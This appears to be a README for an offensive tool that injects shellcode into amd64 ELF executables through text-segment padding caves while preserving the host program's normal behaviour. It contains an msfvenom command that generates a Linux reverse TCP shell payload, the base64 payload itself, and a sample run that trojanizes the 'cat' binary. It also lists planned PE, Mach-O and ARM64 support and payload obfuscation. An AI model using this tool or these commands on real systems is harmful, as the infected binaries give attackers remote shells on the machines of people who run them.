Binary file shellcode injector.
ELF injection based on Silvio Cesar Text Segment padding
Saves original binary execution flow
pip install -r requirements.txt
Works only with amd64 ELF bins, for now...
Example:
Usage: viscr.py <binary> <b64 encoded shellcode>
============
> msfvenom -p linux/x64/shell_reverse_tcp -f base64 LHOST=127.0.0.1 LPORT=4242
ailYmWoCX2oBXg8FSJdIuQIAEJJ/AAABUUiJ5moQWmoqWA8FagNeSP/OaiFYDwV19mo7WJlIuy9iaW4vc2gAU0iJ51JXSInmDwU=
============
> ./viscR.py cat ailYmWoCX2oBXg8FSJdIuQIAEJJ/AAABUUiJ5moQWmoqWA8FagNeSP/OaiFYDwV19mo7WJlIuy9iaW4vc2gAU0iJ51JXSInmDwU=
Using user supplied shellcode
Arch === amd64
Endian === little
Found cave at 0x7049 ; size - 16457
cat_infctd created. Use wisely
- PE, Mach-O support
- ARM64 support
- Shellcode encoding/ubfuscation/encryption
- etc. etc. etc.